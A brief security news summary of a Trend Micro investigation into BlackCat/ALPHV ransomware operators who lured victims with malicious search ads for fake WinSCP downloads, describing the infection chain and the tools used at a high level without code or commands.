BlackCat Abuses Search Ads with Malicious WinSCP Downloads

Category: Ransomware News | Industry: Global | Source: Trend Micro

The incident response team at Trend Micro investigated a network intrusion linked to the BlackCat/ALPHV ransomware gang, which originated from fictitious search advertisements promoting the download of the WinSCP file transfer application. Disguised as a WinSCP tutorial, the deceptive website would land on a compromised WordPress site when the victim attempts to download the application. Then the final stage payload would be downloaded from the file-sharing site named 4shared. "The overall infection flow involves delivering the initial loader, fetching the bot core, and ultimately, dropping the payload, typically a backdoor," said Trend Micro.

Before Trend Micro’s engagement, the hackers gained top-level administrator privileges, leveraging them to carry out unauthorized activities, including establishing persistence, creating backdoor access using remote management tools like AnyDesk, engaging in password theft, and attempting to access backup servers. During the intrusion, the threat actors utilized tools such as Python scripts, batch scripts, AdFind, Cobalt Strike, PowerShell, PowerView, PsExec, BitsAdmin, and AnyDesk. Following Trend Micro's response to the incident, the "attacker was successfully evicted from the network before they could reach their goal or execute their final payload." The tactics, techniques, and procedures (TTPs) from BlackCat enabled Trend Micro to attribute the group to a separate intrusion, in which a specialized EDR and security monitoring disabling tool named SpyBoy terminator was deployed.